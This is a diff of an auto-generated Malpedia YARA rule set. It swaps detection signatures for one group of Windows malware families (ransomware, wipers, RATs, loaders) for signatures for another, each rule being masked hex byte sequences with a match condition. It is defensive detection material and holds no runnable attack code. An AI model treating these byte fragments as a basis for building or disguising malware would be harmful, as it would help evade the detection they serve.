-		$sequence_9 = { 56 e8???????? b14f 83c408 884c2411 b020 884c241a }
+		$sequence_0 = { 8bf0 e8???????? 50 ffd7 8d75d0 8945ec }
+		$sequence_1 = { a80f 0f85c4000000 68f40f0000 8d45ec 50 8d4b0c }
+		$sequence_2 = { 3b450c 0f8d85000000 41 51 8d45e0 e8???????? }
+		$sequence_3 = { 53 56 33db 57 33d2 eb2d }
+		$sequence_4 = { 894df8 890e 3803 7439 8b06 }
+		$sequence_5 = { 88144b 8a0408 8b560c c0e804 046a 88444a01 }
+		$sequence_6 = { c20400 55 8bec 53 57 ff7508 ff15???????? }
+		$sequence_7 = { 8bec 51 8a4201 8845ff }
+		$sequence_8 = { 33c0 8d4de8 e8???????? 8b7de0 8bc3 50 }
+		$sequence_9 = { 32d1 46 8810 3b7508 0f8c74ffffff 5f }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Killdisk_Auto : FILE
+rule MALPEDIA_Win_Moonwalk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c433beb-dada-5b26-9857-13f0bee328ff"
+		id = "ef8baf81-8fc1-5b8a-8169-40c37ce56608"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.killdisk_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonwalk_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "50990d6a3b9890877b878363fc44a7021b275eb6d67ceb6edc1c960b038217f1"
+		logic_hash = "41695c23cda2f92c0bf6c3a4d26b3fdee7d01afc1ec5f837be35f51c67bf067d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146222,38 +146118,32 @@ rule MALPEDIA_Win_Killdisk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8945e4 8b7508 c7465c904c4200 33ff }
-		$sequence_1 = { 75f7 2bca 8d7c243c 8bf2 8bd1 }
-		$sequence_2 = { 881c24 e8???????? d2cd 80d213 66c1e204 8b5500 f8 }
-		$sequence_3 = { eb09 8b442430 2bc1 c1f802 8d3c8500000000 57 }
-		$sequence_4 = { c604243a 9c 8d642434 e9???????? }
-		$sequence_5 = { 84c0 75c1 8d442404 50 }
-		$sequence_6 = { e9???????? 66894500 66897c240c 882c24 }
-		$sequence_7 = { 0f8482000000 55 e8???????? 8b1d???????? }
-		$sequence_8 = { e8???????? 881438 e8???????? 9c c6442408cf 894508 e9???????? }
-		$sequence_9 = { 6800100000 51 8bf0 ff15???????? }
-		$sequence_10 = { 46 66892c24 9c 8d64244c e9???????? 9c }
-		$sequence_11 = { 88442408 50 8d642434 e9???????? }
-		$sequence_12 = { 3b54242c 0f84d5000000 b83092c201 33ff e8???????? 85c0 }
-		$sequence_13 = { e9???????? 883424 ff742420 8f4500 9c }
-		$sequence_14 = { f5 88742408 c70424ba7bbfa4 660fbae408 662dca11 e8???????? 881438 }
-		$sequence_15 = { 8b542438 6888130000 52 ff15???????? }
+		$sequence_0 = { 488d4c2458 4c8978d0 4533ff 4c897c2458 44897d20 e8???????? 85c0 }
+		$sequence_1 = { 488b0d???????? ba833fd2f8 41b8e8c5ba5b 48898140010000 488d0d17880000 e8???????? }
+		$sequence_2 = { 488b05???????? 4c8bb42418050000 4885c0 753c 488d8548040000 4489bd48040000 33d2 }
+		$sequence_3 = { 72ed 443bc2 0f844e020000 33c0 44899500020000 89456c 0f57c0 }
+		$sequence_4 = { 4881c4b0000000 5e c3 488b4718 488b4f20 ff5068 488d942490000000 }
+		$sequence_5 = { 488b4968 4c896c2438 4c896c2430 4c896c2428 4c896c2420 e8???????? 4885db }
+		$sequence_6 = { 488d0508ecffff 48894360 488d05bdf4ffff 48894368 488d05b2f5ffff 48894370 488d05c7f7ffff }
+		$sequence_7 = { 488bfa 440fb65104 440fb64908 440fb6410c }
+		$sequence_8 = { 4154 4155 4156 4157 488dac2458feffff 4881ecb8020000 0f1005???????? }
+		$sequence_9 = { 0f84b6000000 4183f81d 740a b810000000 4883c448 c3 48895c2440 }
 
 	condition:
-		7 of them and filesize < 10817536
+		7 of them and filesize < 179200
 }
-rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
+rule MALPEDIA_Win_Whiskerspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb2e8bb4-ead2-5b5f-8d4b-4b5ca032457e"
+		id = "129d540e-8d5c-5460-9975-895a38c68929"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spora_ransom_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whiskerspy_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "4e1870b731d039931c3cd87b8cbae836b84abbb8438fb88731c5b4fc00862572"
+		logic_hash = "f82e28f98658c3c783c2c1731be6b16001447d83e33b49e0aaa68c9ddf787261"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146267,32 +146157,37 @@ rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d45f0 50 ff5508 }
-		$sequence_1 = { 7436 03fb 83ff0c 72ec }
-		$sequence_2 = { 53 56 ff7508 e8???????? 85c0 7422 56 }
-		$sequence_3 = { ff36 57 ff15???????? 57 e8???????? }
-		$sequence_4 = { 83fe0a 72e4 5e c9 c3 }
-		$sequence_5 = { 8bf0 85f6 7445 8365fc00 8d45fc 50 57 }
-		$sequence_6 = { 8d45f0 50 ff5508 d1eb 46 83fe1a 72c7 }
-		$sequence_7 = { 740e 8b45fc 8b4010 0fb6f0 }
-		$sequence_8 = { 0bf0 57 ff15???????? 5f 8bc6 }
-		$sequence_9 = { 741f ff36 ff15???????? 85c0 7413 0fb600 }
+		$sequence_0 = { 8b06 8bcf d3e8 a801 }
+		$sequence_1 = { 33d2 488d4c2460 41b804010000 e8???????? 33d2 }
+		$sequence_2 = { 418b37 488bfd 488b8c2420010000 4883c510 }
+		$sequence_3 = { 44896ddc 498bd4 498bcd e8???????? 4c8be0 }
+		$sequence_4 = { 4803ca 418bc3 4c3bc1 458b4210 8b0d???????? }
+		$sequence_5 = { 48d3cf 4933f8 4b87bcfee0740200 33c0 488b5c2450 }
+		$sequence_6 = { e8???????? c6043700 488d55e0 498bce e8???????? }
+		$sequence_7 = { 4157 488dac24c8fcffff 4881ec38040000 488bda }
+		$sequence_8 = { 8d45d4 837de808 8b4db0 0f4345d4 8b16 }
+		$sequence_9 = { c685f9fbffff1e c685fafbffff8b 59 c685fbfbffff86 }
+		$sequence_10 = { c685e4feffff7b 889de5feffff 8a85b8feffff 8a840db8feffff }
+		$sequence_11 = { 6a06 59 f3a5 8b75e8 8b7dd8 }
+		$sequence_12 = { 0fbec1 83e820 83e07f 8b0cc5d43b4300 eb02 }
+		$sequence_13 = { 7430 8b5304 8d47f8 8d7308 }
+		$sequence_14 = { 33c0 f68594f9ffff02 899d9cf8ffff 89b5a0f8ffff }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 591872
 }
-rule MALPEDIA_Win_Rerdom_Auto : FILE
+rule MALPEDIA_Win_Hzrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "241210bd-111a-5707-8897-9f53944f382f"
+		id = "67019030-b140-578f-bd57-ed696d61f957"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rerdom_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hzrat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "e2884a0afa7a1b2f6c9a54d86366aeef6787f3f56ae7efd9ba84c1b1c522c12e"
+		logic_hash = "e02b803e3f8c380d72f2cad18c6b29e368b4a184be0cb897b06c0987d88951d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146306,32 +146201,32 @@ rule MALPEDIA_Win_Rerdom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 72f0 8bc3 e8???????? 8d45e4 50 ff15???????? 8b4510 }
-		$sequence_1 = { 7406 c70003010000 85db 740f 53 ff742408 e8???????? }
-		$sequence_2 = { 754d 8b4604 3bc3 7346 3b4608 7341 }
-		$sequence_3 = { 743d 83fb09 7338 8d4704 56 50 8945fc }
-		$sequence_4 = { 894618 85c0 0f84c8000000 a1???????? 85c0 7522 68???????? }
-		$sequence_5 = { 750a 8d75ec e8???????? ebb8 b001 5e }
-		$sequence_6 = { b8???????? 8bcb e8???????? 3bc6 0f8419ffffff 57 b8???????? }
-		$sequence_7 = { 05???????? 50 8d44247c 50 e8???????? 8b442420 2b442424 }
-		$sequence_8 = { 8b45fc c9 c20c00 55 8bec 56 8d4508 }
-		$sequence_9 = { 0f849c000000 e8???????? 8bf8 85ff 0f8489000000 8b44240c 8b88f0000000 }
+		$sequence_0 = { 83fa10 7202 8b3e a1???????? 89040f c6440f0400 eb20 }
+		$sequence_1 = { 8b46e6 3b42e6 7462 0faee8 0fb67ee6 0fb642e6 2bf8 }
+		$sequence_2 = { 33c0 85c9 0f9fc0 8d0c45ffffffff 85c9 0f8559030000 8b461c }
+		$sequence_3 = { 8b450c 85c0 7416 8b5508 0fb64c02ff 80b91002420000 }
+		$sequence_4 = { 57 6a00 ff15???????? 57 85c0 0f859b000000 }
+		$sequence_5 = { 0f1106 ff15???????? 85c0 0f8484010000 0fb74704 50 ff15???????? }
+		$sequence_6 = { 8b45ec 8d4e14 83c40c 8b7d08 8b55f0 83c72c c645fc01 }
+		$sequence_7 = { 8b4dec 8d0411 8b4de8 33d2 }
+		$sequence_8 = { 8d4123 3bc1 0f86e6000000 50 0faee8 e8???????? 83c404 }
+		$sequence_9 = { 8b450c 50 e8???????? 8bc8 83c40c 894df8 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
+rule MALPEDIA_Win_Varenyky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0622b1c6-50a1-59bf-9c9e-674c89b8f214"
+		id = "d2bf30dc-4373-5dce-a9a9-0dfa02ec7d8e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eternal_petya_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.varenyky_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "dc100556655eac63f6dd0a579c598175f64f6a920c350da1549a31a39dd0acc6"
+		logic_hash = "80f9f91b6d82bcfc676dfe7703a76fa743f54b58e262b45f8642f9e3f2fdc01d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146345,32 +146240,32 @@ rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4644 50 53 6a02 }
-		$sequence_1 = { 8bec 51 57 68000000f0 6a18 33ff }
-		$sequence_2 = { 68f0000000 6a40 ff15???????? 8bd8 }
-		$sequence_3 = { 57 68000000f0 6a18 33ff }
-		$sequence_4 = { 55 8bec 51 57 68000000f0 }
-		$sequence_5 = { 55 8bec 51 57 68000000f0 6a18 }
-		$sequence_6 = { 53 8d4644 50 53 }
-		$sequence_7 = { 55 8bec 51 57 68000000f0 6a18 33ff }
-		$sequence_8 = { 51 57 68000000f0 6a18 }
-		$sequence_9 = { 53 68f0000000 6a40 ff15???????? }
+		$sequence_0 = { 1bc0 83d8ff 85c0 0f8467010000 8d8c2490000000 51 6804010000 }
+		$sequence_1 = { 85c0 0f8ef7010000 8b15???????? a0???????? 6a00 }
+		$sequence_2 = { bf697a0000 3bc3 7411 90 69ff81000000 }
+		$sequence_3 = { 8d8c2454010000 68???????? 51 e8???????? 8d84245c010000 83c40c 8d5001 }
+		$sequence_4 = { 83c40c 8d4c2418 51 8d94244c030000 }
+		$sequence_5 = { 57 e8???????? 83c404 3c33 }
+		$sequence_6 = { 8d84244d030000 53 50 c744242404010000 889c2454030000 e8???????? }
+		$sequence_7 = { 0f8c0b0a0000 8ac2 2c20 3c58 7711 0fbec2 0fbe8030c24000 }
+		$sequence_8 = { 3bc3 7411 90 69ff81000000 41 }
+		$sequence_9 = { 8b84241c010000 83c40c 50 33d2 80bc242602000001 b905000000 0f95c2 }
 
 	condition:
-		7 of them and filesize < 851968
+		7 of them and filesize < 24846336
 }
-rule MALPEDIA_Win_Kasperagent_Auto : FILE
+rule MALPEDIA_Win_Fog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5bc59f22-b9b3-5766-9e08-5c129dbebf50"
+		id = "d28c9493-ded7-5c6b-96f1-79a637f3ec06"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kasperagent_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fog_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "8d5948eeb8ffe48e5f1f32cc1b2e0326c959eb92c3d2c7a0786033f96cdcbcd0"
+		logic_hash = "65c8cd27a3044c0ed114d45adeda01dfdb815d1dce8b0ed05ceb7d08d13dca8c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146384,71 +146279,71 @@ rule MALPEDIA_Win_Kasperagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 c645fc03 8b45bc 83c0f0 8d480c 83caff }
-		$sequence_1 = { 83c002 47 3bce 75eb 8bc3 3b5c2410 }
-		$sequence_2 = { 84db 7524 8b4500 83e810 ba01000000 }
-		$sequence_3 = { 663b54243a 7516 668b460c 663b44243c 750b b801000000 5f }
-		$sequence_4 = { 0fb74c2418 81c26c070000 40 668916 }
-		$sequence_5 = { 2bc6 0bd0 b301 7d08 56 8bcd e8???????? }
-		$sequence_6 = { 56 57 33ff 66837c24182d 897c2414 7472 }
-		$sequence_7 = { 89442408 8d742410 8d442408 c7470800000000 }
-		$sequence_8 = { ff500c 837d0800 75cc 5b 5d c20400 8bff }
-		$sequence_9 = { 57 56 ff15???????? 33c9 894c2430 894c2434 894c2438 }
+		$sequence_0 = { 6a64 57 6a00 6800020000 e8???????? 0f1006 8b4514 }
+		$sequence_1 = { 50 8d45fc 50 8d45f0 50 ffd6 8b4510 }
+		$sequence_2 = { 8b8db8f6ffff 85c9 7445 8b3c8dd42b0110 85ff 0f8588000000 33c0 }
+		$sequence_3 = { 83c40c 6b45e430 8945e0 8d8028a10110 8945e4 803800 }
+		$sequence_4 = { 83c408 8bd8 8b4720 6a00 56 53 6a10 }
+		$sequence_5 = { 038c8300180000 0fb6c2 038c8300140000 0fb68308200000 038c8300100000 334cb338 314f38 }
+		$sequence_6 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d901ca10110 }
+		$sequence_7 = { 0f8eac000000 660f1f440000 8d0c8500000000 83bc0d0cffffff02 0f857f000000 8db574ffffff 03f1 }
+		$sequence_8 = { 8b4604 03c3 50 ff36 e8???????? 8b4e04 }
+		$sequence_9 = { 0fb74004 6685c0 7527 ff4508 83c304 }
 
 	condition:
-		7 of them and filesize < 1605632
+		7 of them and filesize < 244736
 }
-rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE
+rule MALPEDIA_Win_Himera_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77652d6a-745f-5552-8901-83bf555706f4"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cerbu_miner_auto.yar#L1-L134"
+		id = "d48b80f9-ba7c-5b70-abe3-35c7e699db08"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.himera_loader_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce"
+		logic_hash = "ac37c3c2c74b38220d6622ffc9fadece4f2263ad47a93b2ffce232c15567e711"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 }
-		$sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? }
-		$sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 }
-		$sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 }
-		$sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 }
-		$sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 }
-		$sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb }
-		$sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 }
-		$sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 }
-		$sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 }
+		$sequence_0 = { c645e656 c645e70e c645e801 c645e90e c645ea18 c645eb1a }
+		$sequence_1 = { 83e03f c1f906 6bd038 8b0c8d00a14200 804c112802 5b }
+		$sequence_2 = { 83bd00faffff00 7409 83bd1cfaffff00 7504 33c0 }
+		$sequence_3 = { 0f84d3000000 8b048d7c3c4200 89858cf8ffff 85c0 0f8498000000 83f801 0f84b5000000 }
+		$sequence_4 = { 6689411e 6a10 ba02000000 c1e204 8b4508 0fb70c10 }
+		$sequence_5 = { 0fb6d0 85d2 744c 8d4df0 e8???????? 8945e8 8b45e8 }
+		$sequence_6 = { e8???????? 83c404 33d2 88957582ffff }
+		$sequence_7 = { 8d950c82ffff 52 8d85ec81ffff 50 8d8de881ffff 51 }
+		$sequence_8 = { 8945f0 50 8d45f4 64a300000000 894da4 c745a048000000 c645a846 }
+		$sequence_9 = { e8???????? 8bc8 e8???????? 50 8b8d3082ffff }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 385024
 }
-rule MALPEDIA_Win_Sfile_Auto : FILE
+rule MALPEDIA_Win_Rhino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e614c85b-182e-5624-9633-dd84a183f73d"
+		id = "301844bb-5a4f-5171-97e6-f16bb6b6ee32"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sfile_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhino_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "4284a47c1e2e07fe055fa45f368d41b804eaf7390d53426d31beb69dd3e007f9"
+		logic_hash = "5ce22b89951420015e2398779d8c31359ab3803912d8b24c1d8c37a7a67db86a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146462,32 +146357,32 @@ rule MALPEDIA_Win_Sfile_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 8b4514 50 e8???????? 83c408 eb49 }
-		$sequence_1 = { 8b55f8 2b55e8 d1fa 8955e4 8b45e4 }
-		$sequence_2 = { 8b55fc c7422000000000 8d45fc 50 }
-		$sequence_3 = { 7433 6aff 8b4dfc 8b5118 52 }
-		$sequence_4 = { 8b4818 51 ff15???????? 8b55fc 8b421c }
-		$sequence_5 = { 8d8db8fdffff 51 e8???????? 83c41c 837dc800 7507 }
-		$sequence_6 = { 8b4244 8b4d08 8b5120 8b4008 }
-		$sequence_7 = { 8b5158 52 e8???????? 83c404 8b4510 }
-		$sequence_8 = { 8b751c 8b4d20 f3a4 837d0802 }
-		$sequence_9 = { 8bec 83ec2c 56 57 c745f400000000 }
+		$sequence_0 = { 3944240c 760a f71487 40 3b44240c 72f6 }
+		$sequence_1 = { 8bc7 c1c806 33c8 8b44242c 33442420 23c7 3344242c }
+		$sequence_2 = { 8d45d8 50 6a06 8bce e8???????? 6a00 6a01 }
+		$sequence_3 = { 03c1 8b4c2420 83d500 894114 8b470c f7e0 }
+		$sequence_4 = { 8d45d0 50 e8???????? e8???????? c20800 8b5114 }
+		$sequence_5 = { 83ec78 8d6c24fc a1???????? 33c5 894578 6a14 b8???????? }
+		$sequence_6 = { 53 53 6800000008 51 53 53 56 }
+		$sequence_7 = { 68???????? 50 e8???????? 83c40c 8365fc00 8bce 50 }
+		$sequence_8 = { 8b06 ff5048 85c0 0f849c000000 807c241006 0f8591000000 57 }
+		$sequence_9 = { 8b5528 0f1101 034c241c 836c242801 89442410 894c2414 758a }
 
 	condition:
-		7 of them and filesize < 588800
+		7 of them and filesize < 1288192
 }
-rule MALPEDIA_Win_Cradlecore_Auto : FILE
+rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fec2c384-0d7c-5ffa-a383-057dccfbd935"
+		id = "711d8460-3e95-57e5-96e4-0d30c9eba978"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cradlecore_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turla_silentmoon_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "cc04ae06802f62915d99191dfee1f4ad76dcf5fb1c40032e747d4c7261b81445"
+		logic_hash = "3d4cfb37bdf5585573f2013bd7786899d7b9f149ed83fd0e028e64c3f10d7b64"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146501,32 +146396,32 @@ rule MALPEDIA_Win_Cradlecore_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d45d8 c645fc1c 50 e8???????? 8d4590 c645fc1d }
-		$sequence_1 = { 8bf8 e9???????? 8b8528e5ffff 8b0c85f01f4300 8b8524e5ffff f644080480 0f8475030000 }
-		$sequence_2 = { 03d9 014c2410 8b54240c 11442414 2bf1 1bf8 8b422c }
-		$sequence_3 = { 8d4db0 8945fc e8???????? 8b55fc 8bcf f7d1 }
-		$sequence_4 = { 8bc3 2b450c 741b 50 }
-		$sequence_5 = { 50 51 8d8c248c000000 e8???????? 8b5508 8d4c2468 }
-		$sequence_6 = { 395c2430 726f 837c243410 8b442420 7304 }
-		$sequence_7 = { c1e606 c1e910 c0e107 8b1485f01f4300 8a443224 }
-		$sequence_8 = { 8b7508 6a00 53 8d4c2430 e8???????? 8bc6 8b4c2444 }
-		$sequence_9 = { 59 85c0 7831 8b1cc55c5e4200 6a55 53 e8???????? }
+		$sequence_0 = { 8b4df4 83c404 51 ffd7 83c404 8d95e4f7ffff }
+		$sequence_1 = { 7ce0 8b55d4 47 03c9 897dd0 3bfa 7ec7 }
+		$sequence_2 = { 41 3b4df0 7ce3 8955d4 83fa11 0f8fe8000000 83f801 }
+		$sequence_3 = { 50 6a01 8d4dff 51 56 c645ffec 895dec }
+		$sequence_4 = { ff15???????? 8b4ddc 8b35???????? 51 ffd6 8b55e0 52 }
+		$sequence_5 = { 85c0 7407 32c0 5e 8be5 5d c3 }
+		$sequence_6 = { 8955fc 8bd9 8975f4 8bc6 8bff 3bc8 7f24 }
+		$sequence_7 = { 09be58020000 8b7df8 898e5c020000 0fb77c7b52 897df4 8b3cba 897dd4 }
+		$sequence_8 = { 83f801 752e 8b4508 8b7c245c }
+		$sequence_9 = { 5f 8be5 5d c3 8b55fc 6a04 8d4df8 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Hemigate_Auto : FILE
+rule MALPEDIA_Win_Sphijacker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f247b7a-51fa-56b6-b5ca-706ac00fbf7d"
+		id = "077eac03-f3ac-5e2b-a96b-7f5530f41d45"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hemigate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hemigate_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sphijacker_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "05c380bd4c229bd57061005a2f77b730cb7f642aa2a7c3aed0193470cbd60a00"
+		logic_hash = "99b2b9f410e1eea51f0fdbb2a2e5758813b393a388e6990a38118e63ac79cf3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146540,32 +146435,32 @@ rule MALPEDIA_Win_Hemigate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 0f8597000000 8bd3 8d4ddc e8???????? 8bf0 85f6 }
-		$sequence_1 = { c1e208 0bd1 0fb64f06 3155a8 0fb65707 c1e208 0bd1 }
-		$sequence_2 = { c3 ff75f4 ff36 ff15???????? 8bf0 83c408 85f6 }
-		$sequence_3 = { 8b550c 8d45d4 50 8d8fa8000000 e8???????? 8b55cc 8d8fb8110100 }
-		$sequence_4 = { 83f801 0f85b8000000 ffb55cf7ffff ffd3 0fb7c0 8d9554f7ffff 6a02 }
-		$sequence_5 = { c1c919 33c8 8b75ec 8bc7 8b7de8 c1c806 33c8 }
-		$sequence_6 = { c1e903 f7e1 56 c1ea03 33f6 8d0492 03c0 }
-		$sequence_7 = { eb48 b840000000 8bfb 2bc1 3bd8 0f43f8 8d462c }
-		$sequence_8 = { 0f84a4f4ffff 8b45c8 0345c4 53 50 51 e8???????? }
-		$sequence_9 = { 8d742418 8bf8 f3a5 8143080c020000 e9???????? 8d4c2418 51 }
+		$sequence_0 = { 33db 488d154de60100 4533c0 488d0c9b 488d0cca baa00f0000 e8???????? }
+		$sequence_1 = { 4885c9 741c 488d05208b0000 483bc8 7410 b801000000 f00fc1815c010000 }
+		$sequence_2 = { 488d159ee00100 ff15???????? 488b4d20 488d4510 c744242804000000 }
